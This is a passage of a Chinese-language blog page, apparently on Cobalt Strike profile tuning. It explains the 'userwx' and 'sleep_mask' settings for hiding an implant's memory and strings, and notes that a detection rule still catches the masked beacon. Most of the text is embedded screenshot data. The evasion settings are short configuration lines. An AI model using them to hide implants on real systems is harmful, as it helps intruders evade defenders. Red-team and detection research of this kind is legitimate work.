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
</p>
<h4 id=0x0315-sleep_mask>
 0x0315 Sleep_Mask
 <a class=heading-link href=#0x0315-sleep_mask>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h4>
<p>官方解释如下：</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>在启用Sleep_Mask之前，先了解一下userwx配置</p>
<pre tabindex=0><code>set userwx "false";
</code></pre><p>反射加载时是否要把内存设置为可读可写可执行，默认为RWX，设置为false时内存设置为RX</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>然后配置启用sleep_mask</p>
<pre tabindex=0><code>set sleep_mask "true";
</code></pre><p>正如官方所说，确实对字符串进行了加密，但是会多出一条新的规则，很明显sleep_mask默认的规则已经被检测了</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
<p>在内存中也确实找到了这个规则</p>
<p><img loading=lazy src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABpYAAALUCAIAAACO2Za4AAAgAElEQVR4nOzdeXwT5do//s8Anuf7O57jgspO2dKqJSiuYCKrCKZFrahRRC2iNm6QuKCgqKC44pK4ntajghsaQevShEWloK3gyhKqNmEroKiIer6v5/s8z3mU+f0xM8kkuWcyadIF+LxfvI50Zu77vu57Jj3m8poZSZbljevWgIiIiIiIiGiftah6SW1tbW1tbVsHQkSUN5G1qwceP2TjujUDjx/SSb/j1Ateao3xJUjKPwQbtR90/0zdLmgMSJJoo26foG/BgEZjZGgkpf1ktDstFFHckJIH0h2dtjWxTRJt1O0yXnTRuqWNlGExU39I7tZo3dIWDakrZXkxjSZjPBvhJSOMSDRn4akQnDdJF1ta38ZXfaJlajQWLkKjZTW7UgQBWr0IDUe2tG5G1zUgWV1j3SbhJ9nkoMwXoWi3UV9Gv9tSB0ruXfhLwSQO3Tbh7wPxYpqsm3AOSQFk89vD6Mwnx2tpMVOjgcGKWPhlkbzB8kUovgbNfgHBYG66XVkspiiuzL89jD4NRr/LkLpoRhsyn2wtMPFiGnWRtt1gblaHMv73gbz+Kjb57WF0Sep2W5uM8efcajhGF6HVXx7GF2HqNStcJ9NPhdHvvgxXn6XfHsKPmcl1nDay8L